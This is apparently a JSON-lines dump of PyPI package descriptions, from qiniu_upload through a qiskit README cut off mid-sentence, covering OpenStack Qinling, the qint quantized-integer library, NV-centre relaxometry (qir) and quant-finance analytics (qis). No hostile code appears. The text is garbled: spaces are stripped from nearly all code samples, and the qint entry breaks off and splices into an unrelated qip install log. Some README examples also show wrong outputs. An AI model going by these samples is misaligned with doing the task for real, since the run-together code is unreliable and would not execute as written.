\u7531\u4e8e\u5c06\u79c1\u94a5\u52a0\u5165\u4e86\u955c\u50cf,\u4efb\u4f55\u62ff\u5230\u4f60\u7684\u955c\u50cf\u7684\u7528\u6237,\u5c06\u53ef\u4ee5\u83b7\u53d6\u5230\u4f60\u7684\u79c1\u94a5TODOS:\u5f02\u5e38\u5904\u7406\u5355\u5143\u6d4b\u8bd5\u6d4b\u8bd5\u5f02\u6b65\u5410\u69fd\u4e00\u4e0b\u4e03\u725b\u7684\u5de5\u5355\u5904\u7406,\u6211\u63d0\u4e86\u81f3\u5c113\u4e2abug,\u8981\u4e48\u88c5\u50bb,\u8981\u4e48\u8bf4\u5bf9\u4e0d\u8d77,\u6211\u4eec\u6709\u95ee\u9898,\u8bf7\u4f60\u4f7f\u7528\u5176\u4ed6\u65b9\u6cd5...\u53e6\u5916\u6587\u6863\u81ea\u5b9a\u4e49\u6570\u636e\u5904\u7406\u8fd9\u5757\u6587\u6863\u4e5f\u6bd4\u8f83\u7cdf\u7cd5.\u6709\u95ee\u9898\u53ef\u4ee5\u63d0issue\u6211\u95ee\u6211,star\u6570\u4e0a50\u518d\u8003\u8651\u5355\u5143\u6d4b\u8bd5\u5427~Xavier-Lam@NetDragon"} +{"package": "qiniu_upload", "pacakge-description": "UNKNOWN"} +{"package": "qinling", "pacakge-description": "NoteQinling (is pronounced \u201ctchinling\u201d) refers to Qinling Mountains in southern\nShaanxi Province in China. The mountains provide a natural boundary between\nNorth and South China and support a huge variety of plant and wildlife, some\nof which is found nowhere else on Earth.Qinling is Function as a Service for OpenStack. This project aims to provide a\nplatform to support serverless functions (like AWS Lambda). Qinling supports\ndifferent container orchestration platforms (Kubernetes/Swarm, etc.) 
and\ndifferent function package storage backends (local/Swift/S3) by nature using\nplugin mechanism.Free software: under theApache licenseDocumentation:https://docs.openstack.org/qinling/latest/Source:https://opendev.org/openstack/qinlingFeatures:https://storyboard.openstack.org/#!/project/927Bug Track:https://storyboard.openstack.org/#!/project/927Release notes:https://docs.openstack.org/releasenotes/qinling/IRC channel on Freenode: #openstack-qinling"} +{"package": "qinling-dashboard", "pacakge-description": "Qinling dashboard is a horizon plugin for Qinling.License: Apache licenseDocumentation:https://docs.openstack.org/qinling-dashboard/latest/Source:https://git.openstack.org/cgit/openstack/qinling-dashboardBugs:https://bugs.launchpad.net/qinling-dashboardTeam and repository tags"} +{"package": "qin-plot", "pacakge-description": "Pymatsci(Python Materials Science) is a robust, open-source Python library for materials analysis. It is further packaged and developed on the basis ofPymatgen, a very powerful package of material analysis. Pymatsci is dedicated to quick and easy operations, so that people can get the results they want without taking too much time.\nMore detailed information can refer to thewiki."} +{"package": "qinst", "pacakge-description": "Quantum Experiments Drivers"} +{"package": "qint", "pacakge-description": "Quantized Integer Operations (QInt) LibraryThe Quantized Integer Operations (QInt) library is a Python package for performing arithmetic operations on quantized integers. It allows for exact arithmetic calculations while working with numbers that have been quantized for precision. This library is particularly useful when dealing with numerical computations that require high precision.AboutQuantized Integers (QInt) are a specialized numeric data type that represents integers with a defined level of precision. In simple terms, a quantized integer consists of two components:Value: This is the integer value you want to represent.Precision: This is the number of decimal places to which the integer value is quantized.\nFor example, if you have a value of 123 and a precision of 2, it means that you are representing the number 123 as 1.23 with two decimal places of precision. Quantized integers allow you to work with exact fractional values while maintaining control over precision.Why are Quantized Integers Important?1. Precision ControlQuantized integers provide precise control over the level of precision in numeric calculations. In contrast to floating-point numbers, which have limited precision and may introduce rounding errors, quantized integers enable exact arithmetic operations. This makes them essential for applications where precision is critical, such as financial calculations, scientific simulations, and engineering designs.2. Avoiding Floating-Point ErrorsFloating-point arithmetic in traditional programming languages (e.g., Python's float) can result in unexpected errors due to the inherent limitations of floating-point representations. Quantized integers eliminate these errors by representing values as scaled integers, ensuring that calculations are performed exactly as intended.3. Deterministic ResultsQuantized integers offer deterministic results in computations. This means that the same operations performed on quantized integers will always yield the same results, regardless of the platform or environment. This determinism is crucial in applications like cryptography, where consistent results are essential.4. 
Compatibility with Integer Operations
Despite their fractional representation, quantized integers can seamlessly interact with regular integer operations, making them versatile for various use cases. You can add, subtract, multiply, divide, and perform other standard mathematical operations on quantized integers just like regular integers.
When Should I Use Quantized Integers?
Quantized integers are particularly valuable in scenarios where precision matters and floating-point inaccuracies can lead to significant problems. Consider using quantized integers in the following situations:
- Financial Calculations: Precise monetary calculations require exact representation of decimal values to avoid rounding errors.
- Scientific Research: In scientific simulations and experiments, maintaining precision is crucial for accurate results.
- Control Systems: Systems that rely on precise numeric values, such as robotics and automation, benefit from deterministic calculations.
- Cryptography: Cryptographic algorithms demand exact results to ensure the security and reliability of the system.
Installation
You can install the library using pip like so: pip install qint
Usage
To use the QInt library, you first need to import the necessary modules:
from qint import QInt
Creating a Quantized Integer
You can create a quantized integer using the QInt class. Quantized integers are represented by two attributes, value and precision, where value is the quantized integer value and precision is the precision of the quantized value.
# Create a QInt with a value of 123 and precision of 2
qint = QInt(123, 2)
If you instead want to create a QInt based on an actual float or integer value at a given precision, call the static create method:
# Create a QInt with a value of 147 and a precision of 2
qint = QInt.create(1.47, 2)
Arithmetic Operations
QInt supports various arithmetic operations, including addition, subtraction, multiplication, division, and more. It is worth noting that addition and subtraction can be performed either with another QInt or with an integer. If done with an integer, it is treated with the implied precision. 
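The create call above presumably scales the given float by 10 to the power of precision to obtain the stored integer value (the README's own example stores 147 for 1.47 at precision 2). A small, hedged sketch of that scaling rule follows; to_quantized_value is a hypothetical helper used only for illustration, not part of the qint API.

```python
# Hedged sketch of the scaling rule implied by QInt.create(1.47, 2) -> value 147.
# `to_quantized_value` is a hypothetical illustration helper, not a qint API.
def to_quantized_value(x: float, precision: int) -> int:
    return round(x * 10 ** precision)

assert to_quantized_value(1.47, 2) == 147  # matches QInt.create(1.47, 2)
assert to_quantized_value(4.00, 2) == 400  # the operands used in the example below
```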
For example:q1=QInt.create(4.00,2)q2=QInt.create(4.00,2)q3=q1+q2# QInt(800, 2)q4=q1+4# QInt(800, 2)In addition to integers and QInts, multiplication and division can also be performed with pythonFractionobjects (from the standardfractionslibrary):fromfractionsimportFractionq1=QInt.create(4.00,2)q2=QInt.create(4.00,2)q3=q1+q2# QInt(1600, 2)q4=q1*4# QInt(1600, 2)q5=q1*Fraction(1,2)# QInt(200, 2)Comparison OperationsYou can also compare QInt instances using standard comparison operators like ==, !=, <, <=, >, and >=.qint1=QInt(100,2)qint2=QInt(200,2)ifqint1>>qipinstallscipyinfo:Requested'scipy'info:Installed'scipy-1.5.2'.info:Wizdefinitioncreatedfor'scipy-1.5.2'.info:Requested'numpy>=1.14.5'[from'scipy-1.5.2'].info:Installed'numpy-1.19.2'.info:Wizdefinitioncreatedfor'numpy-1.19.2'.info:Packagesinstalled:numpy-1.19.2,scipy-1.5.2info:Packageoutputdirectory:'/tmp/qip/packages'info:Definitionoutputdirectory:'/tmp/qip/definitions'AWizdefinition is created\nfor each package installed in order to safely use it within a protected\nenvironment.>>>wiz-add/tmp/qip/definitionsusescipy--pythonDocumentationFull documentation, including installation and setup guides, can be found athttps://qip.readthedocs.io/en/stable/CopyrightCopyright (C) 2018, The MillThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU Lesser General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.This program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU Lesser General Public License for more details.You should have received a copy of the GNU Lesser General Public License\nalong with this program. If not, see ."} +{"package": "qipipe", "pacakge-description": "Quantitative Imaging pipeline. See thedocumentationfor more information."} +{"package": "qiplot", "pacakge-description": "Checklist to update version on PyPi and Gitlab:edit codeedit setup.py (increase version number)cd to same level as setup.pypypipython -m buildtwine upload dist/* --skip-existinggitlabgit push"} +{"package": "qi.portlet.TagClouds", "pacakge-description": "Introductionqi.portlet.TagClouds is a plone product that adds tag cloud portlet support. The following parameters of the portlet are configurable through the web:portlet titlenumber of different tag sizesmaximum tags to showcontent types searched (optionally)tags (subjects) searched (optionally)section of the site to be searchedworkflow states searchedfiltering by keywords so that a tag cloud of all keywords that are combined\nwith the filter keywords is shownqi.portlet.TagClouds also comes with a simple caching mechanism. Cache remains\nvalid for a time interval that can be set in the portlet settings.Changelog1.35Update buildout.cfg to Plone 4.2, gitignore build products [gyst]Change import to work with Plone 4.1.x and Plone 4.2.x [lccruz]1.34Moved collective.testcaselayer from the install_requires to a \u2018test\u2019\nextras_require. [maurits]Do not require cmf.ManagePortal to add or edit the portlet [erral]1.33Enable (language-independent) content across multiple INavigationRoot\nFolders to be searched for tags [gyst]Change import of IVocabularyFactory in order to work with Plone 4.0.x and\nPlone 4.1.x [erico_andrei]Added Brazilian Portuguese translation [erico_andrei]1.32Removed the member id from the cache key in portlet. 
Credits to dimo for\nreporting. [ggozad]Switched to using native plone vocabulary for workflow states on portlet\nedit form. [piv]Remove old file structure now that everything moved to src/ subfolder.\n[kdeldycke]Added german translation [kiwisauce]1.31Fixed a case where the edit form is invoked and a previously selected\nkeyword does not exist anymore. [ggozad]Fixed cache key for multiple sites. Thanks to Guido Stevens [ggozad]Plone 4 compatibility. [ggozad]Moved to using collective.testcaselayer for testing. [ggozad]1.30The product is now accompanied with proper tests. [ggozad]Added filtering by keyword. Thanks to lzdych for the idea and\ndiscussions. [ggozad]All important parameters (workflow states, portal types and search path)\nare now present in the search links. [ggozad]Moved vocabularies. [ggozad]Removed the settings shouldRestrictBySubject and shouldRestrictByTypes.\nNow just using sane defaults. [ggozad]Modified the caching mechanism, so that it takes into account the portlet\nsettings. This ensures separate caching for separate portlets. [ggozad]Added the member in the portlet cache key. This will increase the\ncalculations necessary, but is important as it was possible to cache private\nobjects as well. [ggozad]Added the number of items found under the tag in thetitleof the links.\n[lzdych]Up french translation with new msgids. [toutpt]Add translation of workflow states vocabulary. [toutpt]1.21Fixed caching policy for multilingual sites, resolves: #2 [lzdych]Added quoting of tag links: fixes not working search by tags with special\nchars. [lzdych]Added czech translation. [lzdych]extended html markup to support rounded corners, resolves: #1. [lzdych]1.20Added french translation. [toutpt]1.11Added workflow states to the configuration options. [ggozad]Added maximum tags to display to the configuration options. [ggozad]1.1Added root folder to search under. [ggozad]1.0Initial release [ggozad]"} +{"package": "qipp", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qiprofile-rest", "pacakge-description": "qiprofileREST API.\nSee thedocumentationfor more information."} +{"package": "qiprofile-rest-client", "pacakge-description": "Displays the OHSU QIN images and annotations. See thedocumentationfor more information."} +{"package": "qipu", "pacakge-description": "Qipu: Market simulator served with the FIX protocol"} +{"package": "qipype", "pacakge-description": "Python wrappers for QUIT"} +{"package": "qiq", "pacakge-description": "qiq is the thin layer over pip with some principles.requirements.txt becomes qiq.txtvirtual environment created in project invenvevery package inqiq.txthas exact version or links to local directorycan make symlinks for local developmentNo requirements exceptPython 3.UsageFor exampleMy-Company-Coreis the Company's core library used almost in all projects. It's development files located relative to current project is../my_company_core.\nOurqiq.txtwill be:+dev:../my_company_core\nMy-Company-Core==1.2.7\nFlask==1.0.2\nflask-cors==3.0.7+devis the flag, which can be given inqiqcommand.\nThis will symlinkmy_company_coreto../my_company_core:qiq +devAnd this will install production use code to venv:qiqBy default used library name is last directory in path. 
It can be overriden with name and==:+dev:Company-Core==../my_company_coreVCS also supported:+dev:git+ssh://gitlab.com/myteam/mycompanycore.git@2313ceee"} +{"package": "qiqi20160209", "pacakge-description": "UNKNOWN"} +{"package": "qir", "pacakge-description": "Quantum Impurity RelaxometryMagnons are quanta of spin waves, which are modes of collectively precessing spins. Thermally excited magnons in thin magnetic films generate stray fields at the film surface which can be detected using quantum impurities such as nitrogen-vacancy (NV) centers. NVs are lattice defects in diamond and are able to couple with magnon stray fields. Assuming a thermal occupancy of magnon modes, we study the magnetization dynamics of the magnons propagating through thin magnetic insulators using the Landau-Lifshitz-Gilbert equation.We implement a numerical model to predict and understand the response of the NV center to proximal magnons in thin films. The simulation includes a static bias field in an arbitrary orientation with respect to the quantization axis of the NV center using the diamond\u2019s tetrahedral symmetry. This extended model is in demand due to limitations in present-day measurement techniques to align the bias field with an NV center. The code in this module is based on and an extension of the QIR theory presented in Rustagi et al. (2020) [1].InstallationRun the following to install this package:pipinstallqirUsageImport the Quantum Impurity Relaxometry (qir) module.fromqirimportRelaxationRate,ZFS,GAMMAImportnumpyrequired for matrix calculations.importnumpyasnpfromnumpyimportpi,linspace,empty_likeImportmatplotlibrequired for plotting.importmatplotlib.pyplotaspltimportmatplotlib.colorsascolorsCallRelaxationRateclass and choose parameters.B_ext=31e-3Gamma=RelaxationRate(bext=B_ext,quadrants=\"all\",zoom_in_heatmap=1.5,film_thickness=235e-9)Check the input arguments.Gamma.init_localsGet kx, ky meshgrids. 
Create integrand meshgrid corresponding to kx and ky.If creating high-res 2D meshgrid plots, use at leastx_pixels = 500andy_pixels = 500.If calculating rateGammavs fieldB_ext, usex_pixels = 200andy_pixels = 6000.Gamma.create_k_bounds()Gamma.create_k_meshgrids(x_pixels=1000,y_pixels=1000)Gamma.calculate_sum_di_dj_cij()Gamma.create_integrand_grid_exclude_nv_distance()Gamma.create_integrand_grid_include_nv_distance()Getk_x,k_yandGammaintegrand.X=Gamma.kx*1e-6/(2*pi)# 2D numpy array [1/um]Y=Gamma.ky*1e-6/(2*pi)# 2D numpy array [1/um]Z=Gamma.integrand_grid_include_nv_distance# 2D numpy array [rad Hz]Calculate minimum and maximum element inGammaintegrand array.vmin=np.amin(Z)vmax=np.amax(Z)Create a directory where you can save your plots in.path=\"plot-figures\"importos# create directory in current folderos.mkdir(path)ifnotos.path.exists(path)elseNonepath_txt=os.path.join(path,\"txt_files\")path_fig=os.path.join(path,\"figures\")os.mkdir(path_txt)ifnotos.path.exists(path_txt)elseNoneos.mkdir(path_fig)ifnotos.path.exists(path_fig)elseNoneprint(f\"Created:\\n\\t.{path_txt}\")print(f\"Created:\\n\\t.{path_fig}\")Save meshgrids in.txtfiles (optional).B=B_ext*1e4# external magnetic field [Gauss]path_txt_X=os.path.join(path,f\"heatmap_{B:.0f}G_X.txt\")path_txt_Y=os.path.join(path,f\"heatmap_{B:.0f}G_Y.txt\")path_txt_Z=os.path.join(path,f\"heatmap_{B:.0f}G_Z.txt\")np.savetxt(path_txt_X,X,header=f\"Meshgrid kx [1/um]; B_ext ={B:.0f}Gauss\")np.savetxt(path_txt_Y,Y,header=f\"Meshgrid ky [1/um]; B_ext ={B:.0f}Gauss\")np.savetxt(path_txt_Z,Z,header=f\"Log of Gamma integrand [Hz]; B_ext{B:.0f}Gauss\")print(f\"Saved in:\\n\\t{path_txt_X}\\n\\t{path_txt_Y}\\n\\t{path_txt_Z}\")Plot 2D heatmap ofGammaintegrand usingpyplot.pcolormeshinlog_10scale.fig1,ax1=plt.subplots(figsize=(18,8))ax1.set_xlabel(r\"$k_x/2\\mathregular{\\pi}$ (1/$\\mathregular{\\mu}$m)\",fontsize=18)ax1.set_ylabel(r\"$k_y/2\\mathregular{\\pi}$ (1/$\\mathregular{\\mu}$m)\",fontsize=18)im1=ax1.pcolormesh(X,Y,Z,cmap='jet',norm=colors.LogNorm(vmin=1e-11,vmax=vmax),shading=\"auto\")cbar1=fig1.colorbar(im1)cbar1.set_label(r\"$\\Delta k \\log_{10}(\\sum_{i,j} D_i D_j C_{ij})$\",fontsize=18)Save plot.path_to_file=os.path.join(path_fig,\"heatmap_logscale.png\")fig1.savefig(path_to_file)print(f\"Plot saved in:\\n\\t{path_to_file}\")Plot 2D heatmapGammaintegrand usingpyplot.pcolormeshin normal scale.fig2,ax2=plt.subplots(figsize=(18,8))ax2.set_xlabel(r\"$k_x/2\\mathregular{\\pi}$ (1/$\\mathregular{\\mu}$m)\",fontsize=18)ax2.set_ylabel(r\"$k_y/2\\mathregular{\\pi}$ (1/$\\mathregular{\\mu}$m)\",fontsize=18)im2=ax2.pcolormesh(X,Y,Z,cmap='jet',shading=\"auto\")cbar2=fig2.colorbar(im2)cbar2.set_label(r\"$\\Delta k \\log_{10}(\\sum_{i,j} D_i D_j C_{ij})$\",fontsize=18)Save plot.path_to_file=os.path.join(path_fig,\"heatmap_logscale.png\")fig2.savefig(path_to_file)print(f\"Plot saved in:\\n\\t{path_to_file}\")Relaxation rate as function of magnetic fieldCalculate the relaxation rateGamma[MHz] as function of the magnetic fieldB[Tesla].defget_rate_vs_field():x=linspace(1e-3,50e-3,25)y=empty_like(x)foriinrange(len(x)):rate=RelaxationRate(A_exchange=8.47e-12,distance_nv=40e-9,Gilbert_damping=50e-3,film_thickness=40e-9,M_saturation=324000,bext=x[i])rate.kx_min=-5e6*2*pirate.kx_max=5e6*2*pirate.ky_min=-2e6*2*pirate.ky_max=2e6*2*pirate.create_k_meshgrids(x_pixels=200,y_pixels=4000)rate.calculate_sum_di_dj_cij()rate.create_integrand_grid_exclude_nv_distance()rate.create_integrand_grid_include_nv_distance()y[i]=rate.rate_in_MHzreturnx,yPlotGammaas function 
ofB.B,rate=get_rate_vs_field()fig3,ax3=plt.subplots(figsize=(8,6))plt.plot(B,rate)plt.xlabel(\"B (Tesla)\")plt.ylabel(\"Rate (MHz)\")plt.show()QI distance dependencyCalculate relaxation rateGamma[MHz] as function of the distanced[m] between the quantum impurity (e.g. nitrogen-vacancy spin).defget_rate_vs_distance(B=25e-3):x=np.geomspace(50e-9,500e-9,100)y=np.empty_like(x)rate=RelaxationRate(bext=B)rate.create_k_bounds()rate.create_k_meshgrids(x_pixels=100,y_pixels=4000)rate.calculate_sum_di_dj_cij()rate.create_integrand_grid_exclude_nv_distance()foriinrange(len(x)):rate.distance_nv=x[i]rate.create_integrand_grid_include_nv_distance()y[i]=rate.rate_in_MHzreturnx,yPlotGamma[MHz] as function of distanced[meter].d,r=get_rate_vs_distance()plt.plot(d,r)plt.xlabel(\"Distance (m)\")plt.ylabel(\"Rate (MHz)\")plt.show()Spin-Wave Dispersion: DESWs and BVSWsCalculate the relaxation rate for film thickness 235 nm.Gamma1=RelaxationRate(film_thickness=235e-9)Get the wave numbers fromk=0tok=8*2\\pi[1/um].k=np.linspace(0,8e6*2*pi,10000)Calculate the Backward-Volume Spin Wave Dispersion (BVSW).# BVSW (ky=0)Gamma1.kx=kGamma1.ky=np.zeros_like(k)Gamma1.create_w_meshgrids()omega_bvsw=Gamma1.omega_spin_wave_dispersion()Calculate the Damon-Eschbach Spin Wave Dispersion (BVSW).# DESW (kx=0)Gamma1.ky=kGamma1.kx=np.zeros_like(k)Gamma1.create_w_meshgrids()omega_desw=Gamma1.omega_spin_wave_dispersion()Plot the frequencyf[GHz] as function of wave numberk[1/um].plt.figure(figsize=(8,6))plt.plot(k*1e-6/(2*pi),omega_desw*1e-9/(2*pi),label=\"DESW\",c='b')plt.plot(k*1e-6/(2*pi),omega_bvsw*1e-9/(2*pi),label=\"BVSW\",c='r')plt.xlabel(\"k (1/um)\")plt.ylabel(\"f (GHz)\")plt.legend()AuthorsDevelopers:Helena La(theory + code)Contributors:Brecht Simon(theory + code testing)Dr. Toeno van der Sar(theory)Dr. Samer Kurdi(theory)Bibliography[1] A. Rustagi, I. Bertelli, T. van der Sar, and P. 
Upadhyaya, 2020, https://doi.org/10.1103/PhysRevB.102.220403"}
+{"package": "qirest", "pacakge-description": "qiprofile REST server.\nSee the documentation for more information."}
+{"package": "qirest-client", "pacakge-description": "qiprofile REST API.\nSee the documentation for more information."}
+{"package": "qirnn", "pacakge-description": "A novel architecture inspired by principles from quantum computing and neural networks."}
+{"package": "qis", "pacakge-description": "Quantitative Investment Strategies: QIS
The qis package implements analytics for visualisation of financial data, performance reporting, and analysis of quantitative strategies.
The qis package is split into 5 main modules with the dependency path increasing sequentially as follows.
qis.utils is a module containing low level utilities for operations with pandas, numpy, and datetimes.
qis.perfstats is a module for computing performance statistics and performance attribution including returns, volatilities, etc.
qis.plots is a module for plotting and visualization apis.
qis.models is a module containing statistical models including filtering and regressions.
qis.portfolio is a high level module for analysis, simulation, backtesting, and reporting of quant strategies.
qis.examples contains scripts with illustrations of QIS analytics.
Table of contents: Analytics, Installation, Examples (Visualization of price data, Multi assets factsheet, Strategy factsheet, Strategy benchmark factsheet, Multi strategy factsheet), Notebooks, Contributions, Updates, ToDos, Disclaimer.
Updates
Installation
install using pip install qis
upgrade using pip install --upgrade qis
clone using git clone https://github.com/ArturSepp/QuantInvestStrats.git
Core dependencies:
python = \">=3.8,<3.11\",
numba = \">=0.56.4\",
numpy = \">=1.22.4\",
scipy = \">=1.10\",
statsmodels = \">=0.13.5\",
pandas = \">=1.5.2\",
matplotlib = \">=3.2.2\",
seaborn = \">=0.12.2\"
Optional dependencies:
yfinance \">=0.1.38\" (for getting test price data),
pybloqs \">=1.2.13\" (for producing html and pdf factsheets)
Examples
1. 
Visualization of price dataThe script is located inqis.examples.performances(https://github.com/ArturSepp/QuantInvestStrats/blob/master/qis/examples/performances.py)importmatplotlib.pyplotaspltimportseabornassnsimportyfinanceasyfimportqis# define tickers and fetch price datatickers=['SPY','QQQ','EEM','TLT','IEF','SHY','LQD','HYG','GLD']prices=yf.download(tickers,start=None,end=None)['Adj Close'][tickers].dropna()# plotting price data with minimum usagewithsns.axes_style(\"darkgrid\"):fig,ax=plt.subplots(1,1,figsize=(10,7))qis.plot_prices(prices=prices,x_date_freq='A',ax=ax)# 2-axis plot with drawdowns using sns styleswithsns.axes_style(\"darkgrid\"):fig,axs=plt.subplots(2,1,figsize=(10,7))qis.plot_prices_with_dd(prices=prices,x_date_freq='A',axs=axs)# plot risk-adjusted performance table with excess Sharpe ratioust_3m_rate=yf.download('^IRX',start=None,end=None)['Adj Close'].dropna()/100.0# set parameters for computing performance stats including returns vols and regressionsperf_params=qis.PerfParams(freq='M',freq_reg='Q',alpha_an_factor=4.0,rates_data=ust_3m_rate)# perf_columns is list to display different perfomance metrics from enumeration PerfStatfig=qis.plot_ra_perf_table(prices=prices,perf_columns=[PerfStat.TOTAL_RETURN,PerfStat.PA_RETURN,PerfStat.PA_EXCESS_RETURN,PerfStat.VOL,PerfStat.SHARPE_RF0,PerfStat.SHARPE_EXCESS,PerfStat.SORTINO_RATIO,PerfStat.CALMAR_RATIO,PerfStat.MAX_DD,PerfStat.MAX_DD_VOL,PerfStat.SKEWNESS,PerfStat.KURTOSIS],title=f\"Risk-adjusted performance:{qis.get_time_period_label(prices,date_separator='-')}\",perf_params=perf_params)# add benchmark regression using excess returns for linear beta# regression frequency is specified using perf_params.freq_reg# regression alpha is multiplied using perf_params.alpha_an_factorfig=qis.plot_ra_perf_table_benchmark(prices=prices,benchmark='SPY',perf_columns=[PerfStat.TOTAL_RETURN,PerfStat.PA_RETURN,PerfStat.PA_EXCESS_RETURN,PerfStat.VOL,PerfStat.SHARPE_RF0,PerfStat.SHARPE_EXCESS,PerfStat.SORTINO_RATIO,PerfStat.CALMAR_RATIO,PerfStat.MAX_DD,PerfStat.MAX_DD_VOL,PerfStat.SKEWNESS,PerfStat.KURTOSIS,PerfStat.ALPHA_AN,PerfStat.BETA,PerfStat.R2],title=f\"Risk-adjusted performance:{qis.get_time_period_label(prices,date_separator='-')}benchmarked with SPY\",perf_params=perf_params)2. Multi assets factsheetThis report is adopted for reporting the risk-adjusted performance\nof several assets with the goal\nof cross-sectional comparisionRun example inqis.examples.factsheets.multi_assets.pyhttps://github.com/ArturSepp/QuantInvestStrats/blob/master/qis/examples/factsheets/multi_assets.py3. Strategy factsheetThis report is adopted for report performance, risk, and trading statistics\nfor either backtested or actual strategy\nwith strategy data passed as PortfolioData objectRun example inqis.examples.factsheets.strategy.pyhttps://github.com/ArturSepp/QuantInvestStrats/blob/master/qis/examples/factsheets/strategy.py4. Strategy benchmark factsheetThis report is adopted for report performance and marginal comparison\nof strategy vs a benchmark strategy\n(data for both are passed using individual PortfolioData object)Run example inqis.examples.factsheets.strategy_benchmark.pyhttps://github.com/ArturSepp/QuantInvestStrats/blob/master/qis/examples/factsheets/strategy_benchmark.py5. 
Multi strategy factsheetThis report is adopted to examine the sensitivity of\nbacktested strategy to a parameter or set of parameters:Run example inqis.examples.factsheets.multi_strategy.pyhttps://github.com/ArturSepp/QuantInvestStrats/blob/master/qis/examples/factsheets/multi_strategy.py6. NotebooksRecommended package to work with notebooks:pipinstallnotebookStarting local serverjupyternotebookContributionsIf you are interested in extending and improving QIS analytics,\nplease consider contributing to the library.I have found it is a good practice to isolate general purpose and low level analytics and visualizations, which can be outsourced and shared, while keeping\nthe focus on developing high level commercial applications.There are a number of requirements:The code isPep 8 compliantReliance on common Python data types including numpy arrays, pandas, and dataclasses.Transparent naming of functions and data types with enough comments. Type annotations of functions and arguments is a must.Each submodule has a unit test for core functions and a localised entry point to core functions.Avoid \"super\" pythonic constructions. Readability is the priority.Updates30 December 2022, Version 1.0.1 released08 July 2023, Version 2.0.1 releasedCore ChangesPortfolio optimization (qis.portfolio.optimisation) layer is removed with core\nfunctionality moved to a stand-alone Python package: Backtesting Optimal Portfolio (bop)This allows to remove the dependency from cvxpy and sklearn packages and\nthus to simplify the dependency management for qisAdded factsheet reporting using pybloqs packagehttps://github.com/man-group/PyBloqsPybloqs is a versatile tool to create customised reporting using Matplotlib figures and table\nand thus leveraging QIS visualisation analyticsNew factsheets are addedExamples are added for the four type of reports:multi assets: report performance of several assets with goal of cross-sectional comparision:\nsee qis.examples.factsheets.multi_asset.pystrategy: report performance, risk, and trading statictics for either backtested or actual strategy\nwith strategy data passed as PortfolioData object: see qis.examples.factsheets.strategy.pystrategy vs benchmark: report performance and marginal comparison\nof strategy vs a benchmark strategy (data for both are passed using individual PortfolioData object):\nsee qis.examples.factsheets.strategy_benchmark.pymulti_strategy: report for a list of strategies with individual PortfolioData. This report is\nuseful to examine the sensetivity of backtested strategy to a parameter or set of parameters:\nsee qis.examples.factsheets.multi_strategyToDosEnhanced documentation and readme examples.Docstrings for key functions.Reporting analytics and factsheets generation enhancing to matplotlib.DisclaimerQIS package is distributed FREE & WITHOUT ANY WARRANTY under the GNU GENERAL PUBLIC LICENSE.See theLICENSE.txtin the release for details.Please report any bugs or suggestions by opening anissue."} +{"package": "qisa", "pacakge-description": "qISAqISA is an extended ISA data model with enhanced quality assurance layer. 
This tool provides a command line UI and user-friendly GUI."} +{"package": "qiscusapi", "pacakge-description": "No description available on PyPI."} +{"package": "qiscus-sdk", "pacakge-description": "Qiscus SDK WrapperPython version of Qiscus SDK wrapperFree software: MIT licenseDocumentation:https://qiscus-sdk.readthedocs.io.FeaturesTODOCreditsThis package was created withCookiecutterand theaudreyr/cookiecutter-pypackageproject template.History0.0.1 (2017-06-07)First release on PyPI."} +{"package": "qishi_dogs", "pacakge-description": "readme"} +{"package": "qiskit", "pacakge-description": "QiskitQiskitis an open-source SDK for working with quantum computers at the level of extended quantum circuits, operators, and primitives.This library is the core component of Qiskit, which contains the building blocks for creating and working with quantum circuits, quantum operators, and primitive functions (sampler and estimator).\nIt also contains a transpiler that supports optimizing quantum circuits and a quantum information toolbox for creating advanced quantum operators.For more details on how to use Qiskit, refer to the documentation located here:https://docs.quantum.ibm.com/InstallationWe encourage installing Qiskit viapip:pipinstallqiskitPip will handle all dependencies automatically and you will always install the latest (and well-tested) version.To install from source, follow the instructions in thedocumentation.Create your first quantum program in QiskitNow that Qiskit is installed, it's time to begin working with Qiskit. The essential parts of a quantum program are:Define and build a quantum circuit that represents the quantum stateDefine the classical output by measurements or a set of observable operatorsDepending on the output, use the primitive functionsamplerto sample outcomes or theestimatorto estimate values.Create an example quantum circuit using theQuantumCircuitclass:importnumpyasnpfromqiskitimportQuantumCircuit# 1. A quantum circuit for preparing the quantum state |000> + i |111>qc_example=QuantumCircuit(3)qc_example.h(0)# generate superpostionqc_example.p(np.pi/2,0)# add quantum phaseqc_example.cx(0,1)# 0th-qubit-Controlled-NOT gate on 1st qubitqc_example.cx(0,2)# 0th-qubit-Controlled-NOT gate on 2nd qubitThis simple example makes an entangled state known as aGHZ state$(|000\\rangle + i|111\\rangle)/\\sqrt{2}$. It uses the standard quantum gates: Hadamard gate (h), Phase gate (p), and CNOT gate (cx).Once you've made your first quantum circuit, choose which primitive function you will use. Starting withsampler,\nwe usemeasure_all(inplace=False)to get a copy of the circuit in which all the qubits are measured:# 2. Add the classical output in the form of measurement of all qubitsqc_measured=qc_example.measure_all(inplace=False)# 3. Execute using the Sampler primitivefromqiskit.primitives.samplerimportSamplersampler=Sampler()job=sampler.run(qc_measured,shots=1000)result=job.result()print(f\" > Quasi probability distribution:{result.quasi_dists}\")Running this will give an outcome similar to{0: 0.497, 7: 0.503}which is00050% of the time and11150% of the time up to statistical fluctuations.\nTo illustrate the power of Estimator, we now use the quantum information toolbox to create the operator $XXY+XYX+YXX-YYY$ and pass it to therun()function, along with our quantum circuit. Note the Estimator requires a circuitwithoutmeasurement, so we use theqc_examplecircuit we created earlier.# 2. 
